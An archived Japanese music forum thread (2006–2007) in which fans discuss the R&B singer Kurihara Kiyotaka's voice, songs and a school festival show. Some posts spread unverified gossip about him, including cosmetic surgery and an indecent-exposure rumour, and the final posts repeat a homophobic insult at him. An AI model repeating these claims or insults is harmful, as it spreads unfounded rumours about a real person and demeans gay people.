黒=Black Music=R&B・SOUL系

115 :NO MUSIC NO NAME:2006/09/17(日) 12:44:38 ID:8Xtg8lIK
あげ

116 :NO MUSIC NO NAME:2006/09/18(月) 14:49:55 ID:9WvNBrqh
久々に見たけど、清貴って顔いじったよね?だから声でなくなっちゃったの?

117 :NO MUSIC NO NAME:2006/09/18(月) 20:29:07 ID:VGMVxuYj
確かに声でなくなったな。それとも、楽曲に合わせてただそういう歌い方してるんじゃない?

118 :NO MUSIC NO NAME:2006/09/18(月) 21:37:23 ID:9WvNBrqh
もともと出なかったけどね。音も不安定だったし。
目だけじゃなく、下手にアゴなんか削っちゃったから声が余計出にくくなっちゃったのかも。

119 :NO MUSIC NO NAME:2006/09/18(月) 23:55:01 ID:qH9IIQUS
>>118元々って、いつの話?

120 :NO MUSIC NO NAME:2006/09/26(火) 22:45:12 ID:J8fy4qEo
>>119
>>118じゃないけど有線大賞の時声まるで出てなかった

121 :NO MUSIC NO NAME:2006/09/26(火) 22:53:41 ID:3/u0/3IG
誰かMステ出てたときの映像とか持ってる人いないかな…
めちゃくちゃ見たいんだが…

122 :NO MUSIC NO NAME:2006/09/26(火) 23:26:20 ID:RCM/H9Rc
>>120確かに緊張するとダメでTVでは上手く歌えてなかったね
メンタル面の弱さが気になる

123 :NO MUSIC NO NAME:2006/10/01(日) 03:13:32 ID:xQUGQHAy
>>99俺は清貴さんの母校に在籍している者です。我が校は来年度から共学化されます。だから今年の文化祭は男子校として最後の文化祭だったわけです。そこでそれにふさわしい方に来ていただこうと、清貴さんが招かれたのです。決して落ちぶれたからではありません。

124 :NO MUSIC NO NAME:2006/10/01(日) 08:53:19 ID:N61ds7YI
実行委員?裏話ききたい

125 :NO MUSIC NO NAME:2006/10/01(日) 15:31:13 ID:xQUGQHAy
実行委員ではないです。すいません。文化祭にはいらっしゃいましたか?

126 :NO MUSIC NO NAME:2006/10/01(日) 18:07:25 ID:N61ds7YI
いったよ 楽しかった
時間が有れば、もっと満喫したかったな

127 :NO MUSIC NO NAME:2006/10/01(日) 20:35:14 ID:xQUGQHAy
嫌な顔一つせず、対応してくださって、本当にいい方だなと思いましたよ。我々の希望の星です。宮城ですら知名度が低いのは残念ですが…。ちなみに、日本ハムファイターズの江尻投手もニ高出身です。

128 :NO MUSIC NO NAME:2006/10/01(日) 21:44:27 ID:TSWjDkDB
サイン会でハッピとかにサインしてたね 写真も撮った?
ライブで女装した子と踊ったのが傑作だったよw

129 :NO MUSIC NO NAME:2006/10/01(日) 21:55:55 ID:xQUGQHAy
撮りました。女装してた奴は「ミスニ高」です。同学年ですが、面白い奴です。

130 :NO MUSIC NO NAME:2006/10/01(日) 22:22:20 ID:TSWjDkDB
じゃぁ三年生か
清貴、仙台では人気あると思ってたけど違うの?

131 :NO MUSIC NO NAME:2006/10/02(月) 03:41:23 ID:xDDnEE4k
知ってる人は知っている的な感じかと…。貴方は宮城の方ですか?

132 :NO MUSIC NO NAME:2006/10/02(月) 14:04:10 ID:ZFLKT2u9
いんや 隣県在住です

133 :NO MUSIC NO NAME:2006/10/02(月) 17:33:08 ID:xDDnEE4k
てことは、あの時県外からお越しの方が他にもいらしたということですね。すごいですね。てっきり皆ニ高生の親御さんや関係者だけかと思っていました。

134 :NO MUSIC NO NAME:2006/10/02(月) 18:48:56 ID:11FC1Dvr
他にも?アットホームで清貴もリラックスしてて凄く良かった
また有るなら行きたいね

135 :NO MUSIC NO NAME:2006/10/02(月) 23:12:29 ID:4UaHVC8R
なんかナイスガイっぽいな〜
The Only Oneみたいな曲をどんどんうたってほしいな

136 :NO MUSIC NO NAME:2006/10/06(金) 16:42:00 ID:oY6JUtgp
もうメジャーでやらないの?

137 :NO MUSIC NO NAME:2006/10/06(金) 17:35:20 ID:zqPlPtIS
売れないんだろね。

138 :NO MUSIC NO NAME:2006/10/08(日) 04:05:06 ID:6iSvVz0e
みんなで応援して盛り上げましょうよ。

139 :NO MUSIC NO NAME:2006/10/16(月) 23:12:49 ID:SopF5fZr
岩手で陰毛だしたらしい

140 :NO MUSIC NO NAME:2006/10/17(火) 04:19:10 ID:7E1AuIeG
>>139
kwsk

141 :NO MUSIC NO NAME:2006/10/17(火) 12:02:30 ID:M5UPA5nE
ズボンの股上が浅くて見えてたんだってさ

142 :NO MUSIC NO NAME:2006/10/17(火) 15:24:06 ID:ChxzhxbC
何この糞スレ!マライアって、わらわせるんじゃないよ。喪中

143 :NO MUSIC NO NAME:2006/10/17(火) 20:39:56 ID:ihXAnaVO
何ついて切れてんだ?確かに糞だが
アンチなのかファンなのか

144 :NO MUSIC NO NAME:2006/10/18(水) 01:05:57 ID:QjDqxpmZ
The Only Oneには泣けたな。名作だよね。それにあの歌唱力、マライアのコピーだとしても凄い。彼のあの歌唱力を生かせる曲に巡り合えれば、またヒットもあるだろう。消えていくには惜しい歌手だよ。

145 :NO MUSIC NO NAME:2006/10/18(水) 04:44:43 ID:4+kK6h3p
ホイッスルが失われたのは惜しいが、それでも声が絶品だからな

146 :NO MUSIC NO NAME:2006/10/18(水) 10:31:40 ID:0EaWYUYL
今って誰が作曲してんの?

147 :NO MUSIC NO NAME:2006/10/19(木) 04:13:33 ID:W7ACRWVz
本人 

148 :NO MUSIC NO NAME:2006/10/21(土) 23:49:49 ID:AtApbNwP
>>145
新曲聴いたの?
声終わってんじゃん。

149 :NO MUSIC NO NAME:2006/10/22(日) 08:09:26 ID:YzvXYl+f
生で聴いてみぃ

150 :NO MUSIC NO NAME:2006/10/22(日) 17:08:52 ID:E6Ij6QlY
この人の中で一番ハイトーンな曲ってどれ?

151 :NO MUSIC NO NAME:2006/10/23(月) 00:47:22 ID:2b3WnIqb
漏れは3オクターブしか出ないなぁ。

152 :NO MUSIC NO NAME:2006/10/23(月) 09:52:40 ID:HbS4tCSI
>>150 The Only Oneの間奏に入ってるホイッスルじゃね?

153 :NO MUSIC NO NAME:2006/10/23(月) 15:41:50 ID:hTpEyfmD
杉山清貴とは別人?

154 :NO MUSIC NO NAME:2006/10/23(月) 16:31:06 ID:KF8yJU2p
http://www.g-glamour.com/

155 :NO MUSIC NO NAME:2006/10/24(火) 18:34:29 ID:MQ6C60uw
>>153
別人。こっちの清貴は栗原清貴。

156 :NO MUSIC NO NAME:2006/10/26(木) 12:25:10 ID:fpjyePUu
ホイッスル出る人って貴重?
他に日本人じゃ誰がいるの?

157 :NO MUSIC NO NAME:2006/10/26(木) 17:16:38 ID:YNSl4TEq
ttp://daisakuvoice.com
日本人じゃないけど、これ凄い
ttp://www.youtube.com/watch?v=Se1FFJjrsrw

158 :NO MUSIC NO NAME:2006/10/26(木) 17:45:54 ID:9IfkLu4y
この間、中古で清春のCD買いました
家にかえってよく見てみると清貴でした
これが清貴との出会いです






次の日売りました

159 :NO MUSIC NO NAME:2006/10/27(金) 16:02:02 ID:P5PnAkyK
ネタだろ

160 :NO MUSIC NO NAME:2006/10/28(土) 12:20:01 ID:9pJ6J/qM
>>158
買い直せ。

161 :NO MUSIC NO NAME:2006/10/28(土) 17:34:12 ID:qEKtdJu7
ライブ行った人いないの?

162 :NO MUSIC NO NAME:2006/10/29(日) 02:17:47 ID:nrPAJpMP
ライブ声でてたよ よかった。

163 :NO MUSIC NO NAME:2006/11/07(火) 12:30:21 ID:turANrR7
Respect!清貴!
今はどうか知らないけど、彼の才能(歌声、歌唱力、技術)は平井堅以上だよ!
The Only One歌いこなせる奴は(原キーで)多分一万人に一人くらいだな。

164 :NO MUSIC NO NAME:2006/11/08(水) 00:21:51 ID:GKH3jleE
ホイッスル自体は誰でも出来るそうだけど、どーなんだろーね

165 :NO MUSIC NO NAME:2006/11/08(水) 22:54:03 ID:WiHC7YyJ
ヴリッジの片割れはホイッスル使うよね

166 :NO MUSIC NO NAME:2006/11/12(日) 00:53:04 ID:OSpCQ5vJ
清貴の曲でThe Only Oneより難しい曲いっぱいあるけどな。

167 :NO MUSIC NO NAME:2006/11/12(日) 07:38:30 ID:pyy2ieAz
どーゆーの?

168 :NO MUSIC NO NAME:2006/11/13(月) 14:49:12 ID:3HOMpIAk
Lost child

169 :NO MUSIC NO NAME:2006/11/18(土) 02:29:35 ID:p5YE1vCV
eプラスで半額でチケット買えました。ありがとうございます。

170 :NO MUSIC NO NAME:2006/11/21(火) 21:35:14 ID:EvKn9nM+
むしろ定価で買う人の方が少ないわ

171 :NO MUSIC NO NAME:2006/11/22(水) 16:56:14 ID:GwOyEHzg
清貴君誕生日あげ!
Happy birthday!!

ヾ(^∀^)ノ ワーイワーイ

172 :NO MUSIC NO NAME:2006/11/23(木) 23:56:54 ID:qT+U341j
最近友人にアルバム借りたけどいいね
nononoとかvanishingとかdear friendとか

今はもう声でなくなってるのか、残念

173 :NO MUSIC NO NAME:2006/11/24(金) 00:35:40 ID:34qpcxtp
いや、出ないのはホイッスル 発声かわったけど出るよ

174 :NO MUSIC NO NAME:2006/12/10(日) 19:37:48 ID:2AhMrPYx
あげ

175 :NO MUSIC NO NAME:2006/12/13(水) 00:09:05 ID:mTvvEpua
なぁ、日曜日に、埼玉のウラトコ沿いのオリンピックに宣伝に来てたのこの人?
あれは営業か?

176 :NO MUSIC NO NAME:2006/12/16(土) 05:11:42 ID:xjUtTSs6
自称天才

177 :NO MUSIC NO NAME:2006/12/25(月) 15:13:08 ID:CJJWYI4m
>>176
彼の出身高校は進学校ですよ!

178 :NO MUSIC NO NAME:2006/12/27(水) 00:20:34 ID:a0uY4eQm
てst

179 :NO MUSIC NO NAME:2006/12/28(木) 00:39:10 ID:r2CAS+5D
全部愛しくて〜えぇえぇえ〜えぇえぇえ〜えぇえぇえ〜
って歌初めて聴いた時、うおぉ長げー、すげーって思った。
でも曲名が思い出せない…なんだっけ??

180 :NO MUSIC NO NAME:2006/12/28(木) 01:56:35 ID:uzrsaiKo
Tonight これぐらいでビックリする人はこれ見てどう思うんだw
http://www.youtube.com/watch?v=kLJByp8SBI8

181 :NO MUSIC NO NAME:2006/12/28(木) 08:05:42 ID:IKnbe9rk
こいつ才能ないな
致命的な位センスが悪いからいつまでたっても上手くならない

182 :NO MUSIC NO NAME:2006/12/28(木) 14:50:46 ID:/fSOGmaU
確かに服のセンスが異次元だ

183 :NO MUSIC NO NAME:2006/12/29(金) 03:04:59 ID:4s44UrE/
はいはい、わたし宮一女出身で清貴くんとタメですage


184 :NO MUSIC NO NAME:2006/12/29(金) 03:22:03 ID:NZ6rTLCS
>>180
中間あたりで30秒も伸ばしてるなw

185 :NO MUSIC NO NAME:2006/12/29(金) 15:09:46 ID:CmOFJ9os
>>183知り合い?

186 :NO MUSIC NO NAME:2007/01/01(月) 05:20:29 ID:xn9Ksy2u
大吉ならメジャー復帰

187 :NO MUSIC NO NAME:2007/01/03(水) 07:26:34 ID:tGHaC70l
>>183知り合い?




188 :183:2007/01/05(金) 00:42:30 ID:QtH2q7lT
知り合いではないです…
ごめんなさい

しかも二高の卒業式で歌をうたったらしいとかいう情報しかしりません、ごめんなさい

189 :イケメン好き子:2007/01/05(金) 14:53:57 ID:mV9hS/BI
清貴ゃ∧゛ぇ→ ∪カ`も歌レ1レ1ぉ(゜_゜)

190 :繁々繁男:2007/01/06(土) 13:11:28 ID:ULZMxfWQ
しげしげしげ繁男

191 :黙れ!:2007/01/20(土) 00:02:04 ID:G3e5EW0+
ざけんなよ!!

192 :NO MUSIC NO NAME:2007/01/30(火) 21:44:24 ID:AWV/FAR9
つまんねースレだな 誰か情報持ってないわけ?

193 :NO MUSIC NO NAME:2007/02/04(日) 00:12:31 ID:FmA59QPq
ゲイ清貴きもっ

194 :NO MUSIC NO NAME:2007/02/10(土) 14:21:20 ID:U5jdhc75
ゲイじゃねーよ ミニスカ女がライブに居ると嬉しそうだぞ

195 :NO MUSIC NO NAME:2007/02/10(土) 14:23:02 ID:8UAQbCkD
ゲイ清貴きもっ

196 :NO MUSIC NO NAME:2007/02/10(土) 14:27:22 ID:U5jdhc75
はやっwww

197 :NO MUSIC NO NAME:2007/02/10(土) 21:58:13 ID:xv4E/OwC
清春と紛らわしいから消えろ

198 :NO MUSIC NO NAME:2007/02/11(日) 00:50:50 ID:DYx+nfAZ
ゲイ清貴きもっ

199 :NO MUSIC NO NAME:2007/02/13(火) 23:57:09 ID:f05K7xrh
the only oneのホイッスルあとのサビでフェイク連発するとことか、vlidgeのkyuとかより全然上手いと思う。

それとも、某化学反応のイケメンみたいに、上手かったのは1stアルバムだけって感じなのかな?


200 :清貴マン:2007/02/14(水) 00:07:24 ID:b0s+omTW
ゲイ清貴きもっ

201 :NO MUSIC NO NAME:2007/02/15(木) 18:47:33 ID:+feC5EzJ
ゲイならいいぢゃん(^^)cho

202 :清貴マン:2007/02/15(木) 23:36:11 ID:FbKNUWoQ
ゲイ清貴きもっ

203 :NO MUSIC NO NAME:2007/02/16(金) 00:25:59 ID:AcxiXY+c
ゲイだから可愛いよ(^^)cho

204 :清貴マン:2007/02/16(金) 01:32:15 ID:BVJXYObb
ゲイ清貴きもっ

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)